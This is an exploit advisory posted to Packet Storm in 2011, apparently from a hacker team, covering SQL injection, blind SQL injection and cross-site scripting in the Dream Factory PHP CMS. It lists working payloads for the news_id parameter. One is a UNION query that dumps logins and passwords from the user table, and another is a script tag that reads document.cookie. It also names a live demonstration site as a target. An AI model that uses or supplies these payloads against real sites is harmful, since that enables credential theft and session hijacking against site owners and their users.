Dream Factory Cross Site Scripting / SQL Injection

2011-08-31T00:00:00
ID PACKETSTORM:104653
Type packetstorm
Reporter OuTLaWz
Modified 2011-08-31T00:00:00

Description

                                        
                                            `===================================================================  
Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability  
===================================================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################### 1  
0 I'm The_Exploited member from Inj3ct0r Team 1  
1 ########################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+] Discovered By: The_Exploited  
  
@Title: Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability  
  
@Author: OuTLaWz aka The_Exploited aka l3d aka Spoof  
  
@Mail: spoof@live.it  
  
@Yahoo Messenger: user_31337@yahoo.com  
  
@Site: WwW.SecuritySpl0its.CoM  
  
@Path: http://www.mysite.com/index.php?news_id=[SQL] or [Blind SQL] or [XSS]  
  
@SQL Injection: -null+union+all+select+null,null,concat(login,0x3a,password),null,null,null,null,null+from+user  
  
@Blind SQL Injection: +and+1=1 - +and+1=2  
  
@XSS: "><script>alert(document.cookie)</script>  
  
@Demo: http://www.fipavterni.it/index.php?news_id=[SQL] or [Blind SQL] or [XSS]  
  
@Platform: PHP  
  
@CMS Version: All  
  
@CMS Download: http://www.dreamfactorydesign.it/  
  
  
# 1337day.com [2010-07-11]  
`